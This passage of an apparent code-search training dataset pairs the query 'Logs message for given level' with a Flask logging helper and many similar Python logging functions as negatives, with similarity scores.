child\n if value < child.value:\n child = child.left\n else:\n child = child.right\n\n #new_node/ child\n if value < parent.value:\n parent.left = TreeNode(value)\n else:\n parent.right = TreeNode(value)" ]
[ "0.7562629", "0.7099471", "0.6929827", "0.6921371", "0.6896148", "0.6799146", "0.67869157", "0.67869157", "0.67869157", "0.6710561", "0.6672968", "0.66426194", "0.6601433", "0.6589014", "0.6578079", "0.6524441", "0.6495659", "0.6437595", "0.64201003", "0.64104587", "0.6396286", "0.6373545", "0.6369641", "0.6339456", "0.6285748", "0.62675416", "0.6254328", "0.62269247", "0.6222375", "0.61851555", "0.617066", "0.61464065", "0.6110882", "0.60962814", "0.60962814", "0.6093855", "0.6076747", "0.6063582", "0.6053885", "0.6032814", "0.6009327", "0.59968746", "0.5995155", "0.59796727", "0.5973542", "0.5952178", "0.59308094", "0.5921715", "0.5913448", "0.5913448", "0.5908517", "0.5900128", "0.58977926", "0.587683", "0.58759683", "0.5871815", "0.5856347", "0.58467656", "0.5832517", "0.58318067", "0.58288276", "0.5820516", "0.58172226", "0.5815473", "0.5804777", "0.5801571", "0.57943445", "0.5793195", "0.5792095", "0.579162", "0.57738376", "0.57605845", "0.5759506", "0.5751753", "0.5750151", "0.5745045", "0.57059705", "0.5698944", "0.5694283", "0.56734765", "0.56565046", "0.56483835", "0.5623632", "0.5617265", "0.56148946", "0.5604969", "0.5601191", "0.55979514", "0.55905575", "0.5588806", "0.55789", "0.55789", "0.557822", "0.557539", "0.55696595", "0.55618584", "0.55544835", "0.5553457", "0.55407465", "0.55398864" ]
0.63829994
21
Logs message for given level
def log_message(msg, lvl='info'): extra = { 'remote_addr': request.remote_addr, 'url': request.url_rule } loggers = { 'warning': current_app.logger.warning, 'info': current_app.logger.info, 'debug': current_app.logger.debug, 'error': current_app.logger.error, 'critical': current_app.logger.critical } loggers[lvl](msg, extra=extra)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __log(level, message):\n if level == 1:\n logging.info(\" \" + str(datetime.datetime.now()) + \" \" + message)\n if level == 2:\n logging.error(\" \" + str(datetime.datetime.now()) + \" \" + message)\n if level == 3:\n logging.critical(\" \" + str(datetime.datetime.now()) + \" \" + message)", "def log(self, message, level=None):\n\n if level is None or level.lower() == \"all\":\n level = \"notset\"\n level = getattr(logging, level.upper())\n\n self.logger.log(level, message)", "def log(message, level=\"INFO\"):\r\n print(__get_formatted(message, level))", "def log(self, msg, logging_level):\n\n # log\n self.logger.log(logging_level, msg)", "def log( loglevel, message ):\n E.log( loglevel, message )", "def logs_add_message(self, level, message):\n pass", "def write_log(self, level, message): \n \n level = level.lower()\n #print(level, message,str(self.logger))\n if level == 'debug':\n self.logger.debug('%s', message)\n elif level == 'error':\n self.logger.error('%s', message)\n elif level == 'critical':\n self.logger.critical('%s', message)\n elif level == 'warning':\n self.logger.warning('%s', message)\n else:\n self.logger.info('%s', message)", "def log(self, level, msg, *args, **kwargs):\n\n if self.logger:\n self.logger.log(level, msg, *args, **kwargs)", "def log(self, level: Level, message: str):\n\n try:\n Level(level)\n except ValueError:\n raise ValueError(\"LEVEL parameter must be a Level enum\")\n\n if level == Level.OFF:\n raise ValueError(\"OFF level should only be used to prevent the logger to send any message\")\n\n if self.enabled_for(level):\n _fmt = self._fmt.format(\n datetime=datetime.datetime.fromtimestamp(time.time()),\n level=level.name,\n message=message\n )\n\n # We force the message to be written instantly\n print(_fmt, file=self._output, flush=True)\n if self._tee:\n print(_fmt, flush=True)\n\n os.sync()", "def log(self, level, msg, *args, **kwargs):\n pass", "def log(self, level, msg, *args, **kwargs):\n self._logger.log(level, msg, *args, **kwargs)", "def log(self, msg, level=LOG_INFO):\n self.send_command('log', {\n 'msg': msg,\n 'level': level,\n })", "def logging(cls, lvl, message):\n log = getattr(logging, lvl)\n message = '[{}] {}'.format(cls.__name__, message)\n log(message)", "def log(self, api, msg, level):\n return succeed(log.msg(msg, logLevel=level))", "def logmsg(self, lvl, msg):\n self.logger.log(lvl, msg)", "def log_msg(level, msg):\n now = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.gmtime())\n level = (level+' '*5)[:5]\n msg = msg.replace('\\r', '').replace('\\n', '|')\n\n line = '[{}][{}]: {}\\n'.format(now, level.upper(), msg)\n with open(CONFIG['reportFile'], 'a') as logfp:\n logfp.write(line)", "def log(self, level, msg, *args, **kwargs):\n logging.Logger.log(self, level, '%s::%s'%(self.name, msg), *args, **kwargs)", "def log(self, msg, level=1):\n if self.verbosity >= level:\n print(msg)", "def log(level, message, args=()):\n\tif level >= minimumLogLevel:\n\t\ttry:\n\t\t\tif args:\n\t\t\t\tmessage = message % args\n\t\t\tif level >= screenLogLevel:\n\t\t\t\tlogToScreen(message)\n\t\t\tif level >= fileLogLevel:\n\t\t\t\tLEVEL_PREFIXES = (\n\t\t\t\t\t\"DEBUG: \",\n\t\t\t\t\t\"INFO : \",\n\t\t\t\t\t\"WARN : \",\n\t\t\t\t\t\"ERROR: \",\n\t\t\t\t)\n\t\t\t\tlogToFile(LEVEL_PREFIXES[level] + message)\n\t\texcept UnicodeError:\n\t\t\tpass", "def log(self, msg, level=\"INFO\"):\n if level in ['ERROR', 'CRITICAL']:\n outfunc = sys.stderr.write\n else:\n outfunc = print\n\n # TODO stderr for level = \"ERROR\"\n log_time = 
datetime.utcnow().strftime(\"%Y-%m-%d %H:%M:%S\")\n level_just = level.ljust(10)\n msg = f\"{log_time} {level_just}{msg}\"\n outfunc(msg)", "def log(level, msg):\n weight = \"?\"\n if level>=LOG_LEVEL:\n if level == 0:\n weight = \"DEBUG\"\n elif level == 1:\n weight = \"INFO\"\n elif level == 2:\n weight = \"WARN\"\n elif level == 3:\n weight = \"ERROR\"\n else:\n log(3, \"Invalid log level: {0}\".format(level))\n print(\"{0}: {1}\".format(weight, msg))", "def log(self, msg, level='INFO'):\n if level == Logger.DEBUG:\n self.__logger.debug(msg)\n elif level == Logger.INFO:\n self.__logger.info(msg)\n elif level == Logger.WARN:\n self.__logger.warning(msg)\n elif level == Logger.ERROR:\n self.__logger.error(msg)\n elif level == Logger.CRITICAL:\n self.__logger.critical(msg)\n else:\n pass", "def log( self, level, msg, *args, **kwargs ):\n if self.isEnabledFor( level ):\n msg, kwargs = self.process( msg, kwargs )\n self.logger._log( level, Message( msg, args ), (), **kwargs )", "async def log(self, message, level=logging.INFO):\n\t\tawait self.handle_log(LogEntry(level, self.name, message))", "async def loglevel(self, ctx, level):\n level = level.lower()\n assert level in LEVELS\n await self.bot.log.change_level(LEVELS[level], ctx.author.name)\n await ctx.send(f\"Set log level to {level.upper()}\")", "def logWithLevel(level:int, message:Any, showStackTrace:bool = False, stackOffset:int = 0) -> None:\n\t\t# TODO add a parameter frame substractor to correct the line number, here and in In _log()\n\t\t# TODO change to match in Python10\n\t\tlevel == logging.DEBUG and Logging.logDebug(message, stackOffset = stackOffset)\n\t\tlevel == logging.INFO and Logging.log(message, stackOffset = stackOffset)\n\t\tlevel == logging.WARNING and Logging.logWarn(message, stackOffset = stackOffset)\n\t\tlevel == logging.ERROR and Logging.logErr(message, showStackTrace = showStackTrace, stackOffset = stackOffset)", "def log(self, log_level, text):\n timestamp = '['+str(datetime.datetime.now())+']'\n if log_level == self.ERROR:\n if self.verbose >= self.ERROR:\n print(\"ERROR :\", timestamp, \":\", str(text), file=sys.stderr)\n return\n\n if log_level == self.WARNING:\n if self.verbose >= self.WARNING:\n print(\"WARN :\", timestamp, \":\", str(text), file=sys.stderr)\n return\n\n if log_level == self.INFO:\n if self.verbose >= self.INFO:\n print(\"INFO :\", timestamp, \":\", str(text), file=sys.stderr)\n return\n\n if log_level == self.DEBUG:\n if self.verbose >= self.DEBUG:\n print(\"DEBUG :\", timestamp, \":\", str(text), file=sys.stderr)\n return", "def write(self, message: str, level: LogLevel) -> None:\n if level >= self.min_level:\n self.stream.write(message)", "def set_level(self, level: str):\n self._logger.setLevel(getattr(logging, level))", "def message(self, m : str , level = logging.INFO):\n\n if level == logging.DEBUG:\n self.logger.debug(m)\n elif level == logging.INFO:\n self.logger.info(m)\n elif level == logging.ERROR:\n self.logger.error(m)", "def _log(level:int, msg:Any, stackOffset:int = 0) -> None:\n\t\tif Logging.logLevel <= level:\n\t\t\ttry:\n\t\t\t\t# Queue a log message : (level, message, caller from stackframe, current thread)\n\t\t\t\tcaller = inspect.getframeinfo(inspect.stack()[stackOffset + 2][0])\n\t\t\t\tthread = threading.current_thread()\n\t\t\t\tif Logging.enableQueue:\n\t\t\t\t\tLogging.queue.put((level, msg, caller, thread))\n\t\t\t\telse:\n\t\t\t\t\tif msg:\n\t\t\t\t\t\tLogging._logMessageToLoggerConsole(level, msg, caller, thread)\n\t\t\texcept Exception as 
e:\n\t\t\t\tprint(e)\n\t\t\t\t# sometimes this raises an exception. Just ignore it.\n\t\t\t\tpass", "def log(self, level, message, *args, **kwargs):\n if not self.isEnabledFor(level):\n return\n\n message = message.strip()\n message, kwargs = self.process(message, kwargs)\n\n app_id = self.extra['app_id']\n version = self.extra['version']\n\n if cloud_logger_bg is not None:\n # The following usage is highly unconventional:\n # There appears to be no way to log a structured log message\n # asynchronously using the cloud logging client properly.\n # However, internally, the library uses structured logging. As long\n # as we queue the right payload into the worker's queue, we're OK.\n # This works well with google-cloud-logging==1.9.0.\n # It looks shady, but the only decent way to use the async logging\n # support for Stackdriver.\n cloud_logger_bg.worker._queue.put_nowait(\n {\n 'info': {\n 'app_id': app_id,\n 'version': version,\n 'message': message,\n 'level': getLevelName(level)\n },\n 'severity': getLevelName(level),\n 'resource': Resource(type='global', labels={})\n }\n )\n\n message_pretty = f'{app_id}::{version} => {message}'\n self.logger.log(level, message_pretty, *args, **kwargs)", "def log( cls, level, msg, *args, **kwargs ):\n arg_set = ( level, msg, ) # not clear how to get rest, for now discard\n print( f\"{arg_set[0]} >> {arg_set[1]}\" )\n cls.__log_later.append( arg_set )", "def log_lvl(lvl):\n logs.set_level(logging.getLogger(\"plysp\"), lvl)", "def log(self, level, msg, *args, **kwargs):\n if self.isEnabledFor(level):\n msg, kwargs = self.process(msg, kwargs)\n if (args and len(args) == 1 and isinstance(args[0], Mapping) and args[0]):\n ns = args[0]\n else:\n ns = kwargs\n if args:\n ns['args'] = args\n msg = eval(f'f\"\"\"{msg}\"\"\"', globals(), ns)\n args = ()\n if 'stacklevel' not in kwargs:\n kwargs['stacklevel'] = 3\n kwargs.setdefault('extra', {}).update(topic=self.topic, agent=self.agent,\n context=self.context)\n self.logger.log(level, msg, *args, **{k: v for k, v in kwargs.items()\n if k in ['exc_info', 'stack_info',\n 'stacklevel', 'extra']})", "def TeeLog(self, msg=None, level=0):\n\n if msg != None:\n print(msg)\n logging.info(msg) if level == 0 else logging.warning(msg)", "def level(self, log_level):\n self.logger.setLevel(log_level)", "def emit(self, record):\n try:\n self.MAP[record.levelno](\"%s: %s\" % (record.name, record.msg))\n except KeyError:\n rospy.logerr(\"unknown log level %s LOG: %s: %s\" %\n (record.levelno, record.name, record.msg))", "def log(logger, level, message):\n\n if logger.parent.name != 'root':\n logger.log(level, message)\n else:\n print(message, file=sys.stderr)", "def set_level(self, level: LogLevel):\n pass", "def log_msg(level, msg):\n logger = RUN_CONFIG.get('logger')\n if logger is None:\n print(level, ':', msg)\n else:\n gunicorn_logger = logging.getLogger(logger)\n\n if level == DEBUG:\n gunicorn_logger.debug(msg)\n elif level == INFO:\n gunicorn_logger.info(msg)\n elif level == WARNING:\n gunicorn_logger.warning(msg)\n elif level == ERROR:\n gunicorn_logger.error(msg)\n elif level == CRITICAL:\n gunicorn_logger.critical(msg)", "def handle_log(self, workunit, level, *msg_elements):\r\n if level <= self.settings.log_level:\r\n self.do_handle_log(workunit, level, *msg_elements)", "async def log(self, message, level=logging.INFO):\n\t\tif self.log_queue is not None:\n\t\t\tawait self.log_queue.put(LogEntry(level, self.modulename, message))\n\t\telse:\n\t\t\tprint(str(LogEntry(level, self.modulename, message)))", "def l(msg, 
loglvl=0xFFFFFF):\n global LOG_LEVEL\n if (loglvl & LOG_LEVEL) != 0x0:\n print time.ctime(), ': ' , str(msg)", "def item_log(level, message, attachment=None):\n logger.write(message, level, attachment=attachment)", "def log(level=EVENT_LEVELS.Info, usr=None, msg=''):\n level = level if level in EVENT_LEVELS else EVENT_LEVELS.Info\n usr = None if usr.is_anonymous else usr\n\n if level in log_levels:\n print(f\"{level} Log: {usr} - {msg}\")\n EventLog.objects.create(\n user=usr,\n level=level,\n message=msg\n )", "def set_logging_level(self, level):\n if str(level) == '1':\n self.logging_level = logging.DEBUG\n elif str(level) == '2':\n self.logging_level = logging.INFO\n elif str(level) == '3':\n self.logging_level = logging.WARNING\n elif str(level) == '4':\n self.logging_level = logging.ERROR\n elif str(level) == '5':\n self.logging_level = logging.CRITICAL", "def set_log_level(self, level):\n if level == 'info':\n level = logging.INFO\n if level == 'debug':\n level = logging.DEBUG\n if level == 'error':\n level = logging.ERROR\n self._log.setLevel(level)", "def log(level: str, *messages: str) -> None:\n for message in messages:\n getattr(logger, level)(message)", "def __call__(self, msg=None, level=None):\n\n # get level to log at\n if level is None:\n level = self.level\n\n # are we going to log?\n if level < self.level:\n return\n\n if msg is None:\n msg = ''\n\n # get time\n to = datetime.datetime.now()\n hr = to.hour\n min = to.minute\n sec = to.second\n msec = to.microsecond\n\n # caller module and line number\n (fname, lnum) = self.caller_info()\n\n # get display string for log level\n loglevel = LevelNumToName[level]\n\n # write log message, then flush write to disk (maybe)\n fname = fname[:self.max_name_len]\n self.logfd.write('%02d:%02d:%02d.%06d|%8s|%*s:%-4d|%s\\n'\n % (hr, min, sec, msec, loglevel,\n self.max_name_len, fname, lnum, msg))\n self.logfd.flush()", "def log(self, level, *msg_elements):\r\n self.report.log(self._threadlocal.current_workunit, level, *msg_elements)", "def debug(self, level, *args):\n try:\n basestring\n except NameError:\n basestring = str\n if isinstance(level, basestring):\n args = (level,) + args\n level = 1\n self.mylog.log(logging.DEBUG - level + 1, *args)", "def set_logging_level(self, level):\n return self.sdk.set_logging_level(\n level,\n prefix=self.__class__.__name__,\n )", "def log_to_user(self, level, message):\n if level in ('error', 'info',):\n buffer = self.log_view.get_buffer()\n iter = buffer.get_end_iter()\n buffer.insert(iter, message + '\\n')\n adj = self.log_view.get_parent().get_vadjustment()\n adj.set_value(adj.get_upper() - adj.get_page_size())", "def log(message, level=logLevel.INFO, *args):\n if not logLevel.hasMember(level):\n log(\"Unknown log level: %s\" % level, logLevel.WARN)\n level = logLevel.INFO\n if type(message) != list:\n message = [message]\n lines = []\n for m in message:\n lines += [line for line in str(m).splitlines() if line.strip()]\n if args:\n prefix = ' ' + ' '.join(['(%s)' % p for p in args])\n else:\n frm = inspect.stack()[1]\n mod = inspect.getmodule(frm[0])\n modname = getattr(mod, '__name__', 'main')\n prefix = ' (%s)' % modname\n if lines:\n dtime = datetime.now().strftime(DTFORMAT)\n out_message = \"%s (%s)%s %s\" % (dtime, logLevel.memberName(level),\n prefix, lines[0])\n for line in lines[1:]:\n out_message += \"\\n(==) %s\" % line\n out_message += \"\\n\"\n sys.stderr.write(out_message)", "def write_log(self, msg, level = \"DEBUG\"):\r\n if len(self.parent)> 13:\r\n spacer = \"\\t\"\r\n elif 
len(self.parent) < 8:\r\n spacer = \"\\t\\t\\t\"\r\n else:\r\n spacer = \"\\t\\t\"\r\n \r\n log = level + \"\\t\" + self.parent +spacer +str(msg)\r\n print(log)", "def write(\n self,\n message,\n level=None,\n color=None,\n light=None\n ) -> None:\n\n # Clean message\n message = str(message).rstrip()\n\n # Only log if there is a message (not just a new line)\n if message == \"\":\n return None\n\n # Autoset level if necessary\n if level is None:\n level = self.level\n\n # Convert string level to logging int\n if self._is_string(level):\n level = self._get_level(level)\n\n if level < self.level:\n return None\n\n # Output to with correct level\n if level == logging.DEBUG:\n def_color = \"BLUE\"\n def_light = True\n prefix = '*'\n self.logger.debug(message)\n elif level == logging.INFO:\n def_color = \"GREEN\"\n def_light = False\n prefix = '+'\n self.logger.info(message)\n elif level == logging.WARNING:\n def_color = \"YELLOW\"\n def_light = False\n prefix = '-'\n self.logger.warning(message)\n elif level == logging.ERROR:\n def_color = \"RED\"\n def_light = False\n prefix = '!'\n self.logger.error(message)\n elif level == logging.CRITICAL:\n def_color = \"RED\"\n def_light = True\n prefix = '!'\n self.logger.critical(message)\n else:\n raise Exception('Invalid log level')\n\n if color is None:\n color = def_color\n if light is None:\n light = def_light\n\n # Output to CLI if cli flag is set\n if self.cli:\n self._write_cli(prefix, message, color, light)", "def _log(level: 'CdmStatusLevel', ctx: 'CdmCorpusContext', tag: str, message: str, path: str,\n default_status_event: Callable) -> None:\n # Write message to the configured logger\n if level >= ctx.report_at_level:\n timestamp = time_utils._get_formatted_date_string(datetime.utcnow())\n\n # Store a record of the event.\n # Save some dict init and string formatting cycles by checking\n # whether the recording is actually enabled.\n if ctx.events.is_recording:\n event = {\n 'timestamp': timestamp,\n 'level': level.name,\n 'tag': tag,\n 'message': message,\n 'path': path\n }\n if ctx.correlation_id is not None:\n event['correlationId'] = ctx.correlation_id\n ctx.events.append(event)\n\n formatted_message = _format_message(tag, message, path, ctx.correlation_id)\n\n if ctx and ctx.status_event:\n ctx.status_event(level, formatted_message)\n else:\n default_status_event(formatted_message)", "def setLogLevel(level):\n None", "def logecho(message, level='info'):\n if level == 'error':\n logger.error(message)\n click.echo(Fore.RED + level.upper() + ': ' + Fore.WHITE +\n message, err=True) if verbose else False\n elif level == 'warning':\n logger.warning(message)\n click.echo(Fore.YELLOW + level.upper() + ': ' +\n Fore.WHITE + message) if verbose else False\n elif level == 'debug':\n logger.debug(message)\n click.echo(Fore.GREEN + level.upper() + ': ' +\n Fore.WHITE + message) if debug else False\n else:\n logger.info(message)\n click.echo(message)", "def send_log(manager: SyslogManager, message: str, log_level: str):\n with manager.get_logger() as syslog_logger: # type: Logger\n if log_level == 'DEBUG':\n syslog_logger.debug(message)\n if log_level == 'INFO':\n syslog_logger.info(message)\n if log_level == 'WARNING':\n syslog_logger.warning(message)\n if log_level == 'ERROR':\n syslog_logger.error(message)\n if log_level == 'CRITICAL':\n syslog_logger.critical(message)", "def launch_log(level, message, attachment=None):\n logger.write(message, level, attachment=attachment, launch_log=True)", "def log(msg, loglevel, **kwargs):\n quit = 
kwargs.get('quit', False)\n return_code = kwargs.get('return_code', 0)\n confidential = kwargs.get('confidential', False)\n if confidential:\n handlers_loglevel = {}\n for handler in logger.handlers[1:]:\n handlers_loglevel[handler] = handler.level\n handler.setLevel('NONE')\n getattr(logger, loglevel)(msg)\n for handler, level in handlers_loglevel.items():\n handler.setLevel(level)\n else:\n getattr(logger, loglevel)(msg)\n\n if quit:\n sys.exit(return_code)", "def _set_logger(self, level):\n log.basicConfig(\n format='[%(asctime)s %(levelname)s]: %(message)s',\n level=log._nameToLevel.get(level.upper(), log.DEBUG))", "def _print(self, message, level, color):\n if (self.level >= level):\n sys.stdout.write(color)\n try: sys.stdout.write(\"%s\\n\" % message)\n except: sys.stdout.write(encode(\"%s\\n\" % message))\n sys.stdout.write(COLOR_RESET)\n sys.stdout.flush()\n return message", "def set_log_level(level):\n __log__.setLevel(level)", "def map_level(level):\n if level >= logging.ERROR:\n return 'error'\n elif level >= logging.WARNING:\n return 'warn'\n elif level >= logging.INFO:\n return 'info'\n return ''", "def log(self, message):", "def _set_logger(self, level):\n log.basicConfig(\n format='[%(levelname)s]: %(message)s',\n level=log._nameToLevel.get(level.upper(), log.DEBUG))", "def log_with_color(level):\n def wrapper(text, exc_info=False):\n #modified by zhengchun 20180607\n # color = log_colors_config[level.upper()]\n # getattr(logging, level.lower())(coloring(text, color))\n\n # fn, lno, func, sinfo = _findCaller(stack_info=False)\n # out_text=\"[F:\" + os.path.basename(fn) + \"] [M:\" + func + \"] [L:\" + str(lno) + \"] - \" + text\n sinfo=None\n f=sys._getframe().f_back\n out_text=\"[F:\" + os.path.basename(f.f_code.co_filename) + \"] [M:\" + f.f_code.co_name + \"] [L:\" + str(f.f_lineno) + \"] - \" + text\n if(exc_info):\n sio = io.StringIO()\n sio.write('Stack (most recent call last):\\n')\n traceback.print_stack(f, file=sio)\n sinfo = sio.getvalue()\n if sinfo[-1] == '\\n':\n sinfo = sinfo[:-1]\n sio.close()\n out_text += \"\\n\" + str(sinfo)\n\n getattr(logging, level.lower())(out_text)\n\n return wrapper", "def log(message, verbose=None, level=1):\n if verbose is None:\n verbose = GLOBAL_VERBOSE\n\n if verbose >= level:\n print(message)", "def log_level(given_level):\n if given_level not in constants.log_levels():\n raise argparse.ArgumentTypeError(\"Invalid log level given: \" + given_level)\n return given_level", "def log_msg(msg, loglevel=xbmc.LOGDEBUG):\n if isinstance(msg, unicode):\n msg = msg.encode('utf-8')\n if loglevel == xbmc.LOGDEBUG and FORCE_DEBUG_LOG:\n loglevel = xbmc.LOGNOTICE\n xbmc.log(\"%s --> %s\" % (ADDON_ID, msg), level=loglevel)", "def message(l_type, msg):\n if l_type == logging.INFO:\n logging.info(msg)\n print(msg)\n elif l_type == logging.WARNING:\n logging.warning(msg)\n elif l_type == logging.DEBUG:\n logging.debug(msg)", "def change_level(level):\n if 'debug' in level: LOG.setLevel(logging.DEBUG)\n elif 'info' in level: LOG.setLevel(logging.INFO)\n elif 'warning' in level: LOG.setLevel(logging.WARNING)\n elif 'error' in level: LOG.setLevel(logging.ERROR)\n elif 'critical' in level: LOG.setLevel(logging.CRITICAL)\n Logger.log('info', 'This logger changed the messages priority level to ', level)", "def log(cls, log_message, log_level):\n\n m = l = ''\n is_error = log_level == cls.LOG_LEVEL_ERROR\n\n if isinstance(log_message, GistException):\n log_message = log_message.to_json()\n m = log_message.get('app_message')\n l = '%s, File: %s - Line: 
%s' % (\n log_message.get('error_description'),\n log_message.get('filename'),\n log_message.get('line')\n )\n Logger.log(l, is_error)\n elif isinstance(log_message, ConnectionError):\n m = 'Apparently you are having problems with the internet connection'\n elif isinstance(log_message, Exception):\n exc_type, exc_value, exc_traceback = sys.exc_info()\n m = \"\"\"Apparently something is wrong with the plugin.\n Create a new issue with the log file content. Thanks!\"\"\"\n Logger.log(str(traceback.format_exception(exc_type, exc_value, exc_traceback)), is_error)\n\n elif isinstance(log_message, str):\n m = log_message\n\n cls.__show_app_message('Sync Settings: %s' % (m), log_level)", "def log(text='', level=1):\n\n if loglevel == 0 and adminlevel == 0:\n return 0 # not logged\n\n datetime = time.asctime(time.localtime(time.time()))\n threadname = threading.currentThread().getName()\n logtext = \"%s (%s)[%d]:%s\\n\" % (datetime,threadname,level,text)\n\n logged = 0 # flag if anything is logged\n\n if level > 0 and level <= loglevel:\n # log to logfile\n try:\n logf = open( logfile, 'a' )\n logf.write( logtext )\n logf.close()\n logged = logged + 1\n except IOError:\n # Cannot open logfile for writing - save this problem in adminlog\n logstr = \"<Log>log() - Log warning - cannot write to logfile '%s'\" % logfile\n print logstr\n datetime = time.asctime(time.localtime(time.time()))\n logtext = \"%s [%d]:%s\\n\" % (datetime,3,logstr)\n adminlog.append( logtext )\n\n if adminlevel > 0 and level <= adminlevel:\n # log to adminlog\n adminlog.append(logtext)\n logged = logged + 1\n\n return logged # 0=not logged, >0=logged", "def log(self, loglevel, logstring):\n # filter according to loglevel\n if self.loglevel >= loglevel:\n if loglevel == 0:\n output = \"[ERROR] \" + logstring\n elif loglevel == 1:\n output = \"[INFO] \" + logstring\n elif loglevel == 2:\n output = \"[DEBUG] \" + logstring\n elif loglevel == 3:\n output = \"[WTF] \" + logstring\n\n if self.logfile:\n self.logfile.write(logstring + \"\\n\")\n print(output)", "def _log(self, msg, mode=\"info\"):\n if mode == \"info\":\n self._logger.info(msg)\n elif mode == \"warning\":\n self._logger.warning(msg)", "def __log(self, msg: str, **kwargs: Any) -> None:\n self.logger.log(self.log_level, msg, **kwargs)", "def log(self, message: str):", "def log( self, message, level=None, sentry=False, tags=None ):\n # if no log level passed then use the current level\n if level == None:\n level = self.__logger.getEffectiveLevel()\n\n # get the stack less 1 place so we can report the actual log line and not the line in this function\n s = inspect.stack()[1]\n\n # if called form main then change the name of __main__ from <module> which is a little confusing\n func = s[3]\n if str( func ) == '<module>':\n func = '__main__'\n\n # get the line of code that's executing\n line = int( s[2] )\n\n # set the log level to the default if one is not provided\n if level == None:\n level = self.__logger.getEffectiveLevel()\n\n # if Sentry is and Sentry was defined when initialised then send the event to the Sentry server via the standard logger\n # processing along with any tags that might also have been passed in.\n if sentry and self.__sentry:\n self.__logger.log( level, '(%d)[sid=%s] %s:%d %s' % (\n os.getpid(),\n self.__sentry.get_ident(\n self.__sentry.captureMessage(\n message=message,\n level=level,\n tags=tags\n )\n ),\n func,\n line,\n message\n ) )\n else:\n # if Sentry was not set then log.\n self.__logger.log( level, '(%d) %s:%d %s' % ( os.getpid(), func, 
line, message ) )", "async def set_log_level(self, log_level: str) -> None:\n await self._send_message_get_response(OutgoingMessage(OutgoingMessageType.set_log_level, log_level=log_level))", "def log(level_str, sender, message):\n my_logger = logging.getLogger(__name__)\n # set strict_mode to default value, if not already set\n if not hasattr(log, \"strict_mode\"):\n log.strict_mode = False\n # - lookup table for internal strings to pretty output strings\n pretty_levels = {\n 'CRITICAL' : 'FATAL: ',\n 'ERROR' : 'ERROR: ',\n 'WARNING' : 'WARNING: ',\n 'INFO' : ' ',\n 'DEBUG' : ' ',\n 'NOTSET' : ' '\n }\n message = str(message)\n sender_str = ''\n message_str = ''\n level = LEVELS.get(level_str, LEVELS['ERROR'])\n # -- level\n pretty_level_str = pretty_levels.get(level_str, pretty_levels['ERROR'])\n # -- sender\n if sender != 'panzer':\n # sender_str = ' ' + sender + ': '\n sender_str = ' '\n # -- message\n message_str = message\n output = ''\n output += pretty_level_str\n output += sender_str\n output += message_str\n my_logger.log(level, output)\n # - if 'strict' mode and error logged, raise exception to exit panzer\n if log.strict_mode and (level_str == 'ERROR' or level_str == 'CRITICAL'):\n log.strict_mode = False\n raise error.StrictModeError", "def do_handle_log(self, workunit, level, *msg_elements):\r\n pass", "def log(msg, addr, level=0):\n # log levels\n # 0 - DEBUG\n # 1 - INFO\n # 2 - Warning\n # 3 - ERROR\n # 4 - WARNING\n\n fname = '{}_{}.log'.format(addr[0], str(addr[1]))\n logging.basicConfig(filename=fname, filemode='a', level=logging.DEBUG,\n format='%(asctime)s ; %(levelname)s ; %(message)s',\n datefmt='%m/%d/%Y %I:%M:%S %p')\n if level==0:\n logging.debug(msg)\n elif level==1:\n logging.info(msg)\n elif level==2:\n logging.warning(msg)\n elif level==3:\n logging.error(msg)\n elif level==4:\n logging.warning(msg)\n else:\n logging.debug(msg)\n logging.debug('The level set is not there, it should be in [0,4]')", "def level_logging(self, level):\r\n\r\n # converts the provided logging level value (either string or\r\n # integer value) into the appropriate normalized value that can\r\n # be used internally for logging level setting\r\n level = self._level(level)\r\n\r\n # sets the (new) level value value for both the base stream\r\n # handler and also for the logger itself\r\n self.handler_stream.setLevel(level)\r\n self.logger.setLevel(level)\r\n\r\n # iterates over the complete set of attached handlers to\r\n # update their respective logging level\r\n for handler in self.handlers: handler.setLevel(level)", "def set_logger_level(lgr, level):\n if isinstance(level, int):\n pass\n elif level.isnumeric():\n level = int(level)\n elif level.isalpha():\n level = getattr(logging, level)\n else:\n lgr.warning(\"Do not know how to treat loglevel %s\" % level)\n return\n lgr.setLevel(level)", "def log(level: int, message: str, *args: Any) -> None:\n if level >= logging.ERROR:\n Logger.errors = True\n\n if len(args) > 0:\n try:\n message = message % args\n except TypeError:\n no_additional_complaints()\n raise RuntimeError( # pylint: disable=raise-missing-from\n f\"mismatch between format: {message} \" f\"and args: {args}\"\n )\n\n message = f\"{Invocation.current.log} - {message}\"\n Logger._logger.log(level, message)", "def log(self, message, log_level=\"info\"):\n for word in self.__ignore_output:\n while word in message:\n message = message.replace(word, \"\")\n getattr(logger, log_level)(\"{}{}\".format(self.__output_prefix, message.strip()))", "def print(self, level, message, 
*args):\r\n if level < self.level:\r\n return\r\n\r\n if args:\r\n message = message.format(*args)\r\n\r\n self._raw_insert(level, message)", "def log(\n message: str,\n application: str = \"Red Layer\",\n log_level: int = 0,\n push: bool = False,\n ):\n # send it to QGIS messages panel\n QgsMessageLog.logMessage(\n message=message, tag=application, notifyUser=push, level=log_level\n )\n\n # optionally, display message on QGIS Message bar (above the map canvas)\n if push:\n iface.messageBar().pushMessage(\n title=application, text=message, level=log_level, duration=(log_level+1)*3\n )", "def handle_log(self, api, command, level=None):\n level = command.get('level', level)\n if level is None:\n level = logging.INFO\n msg = command.get('msg')\n if msg is None:\n returnValue(self.reply(command, success=False,\n reason=\"Value expected for msg\"))\n if not isinstance(msg, basestring):\n msg = str(msg)\n elif isinstance(msg, unicode):\n msg = msg.encode('utf-8')\n yield self.log(api, msg, level)\n returnValue(self.reply(command, success=True))", "def log(level, logger_name, *msgs):\n logger = logging.getLogger(logger_name)\n for msg in msgs:\n if (msg != ''):\n logger.log(level, msg)", "def SetLoggingLevel(level):\n SetLogLevelCC(level)\n global logger\n logger.setLevel({\n 'DEBUG': logging.DEBUG,\n 'INFO': logging.INFO,\n 'WARNING': logging.WARNING,\n 'ERROR': logging.ERROR,\n 'FATAL': logging.CRITICAL\n }[level])", "def _get_log_level(level):\n # default to DEBUG\n if level is None or level == \"DEBUG\":\n return logging.DEBUG\n\n level = level.upper()\n # Make debugging configurable\n if level == \"INFO\":\n return logging.INFO\n elif level == \"WARNING\":\n return logging.WARNING\n elif level == \"CRITICAL\":\n return logging.CRITICAL\n elif level == \"ERROR\":\n return logging.ERROR\n elif level == \"FATAL\":\n return logging.FATAL\n else:\n raise Exception(\"UnknownLogLevelException: enter a valid log level\")", "def set_logging_to(level):\n scom.set_logging_to(level)", "def mlevel(level: Union[int, str]) -> 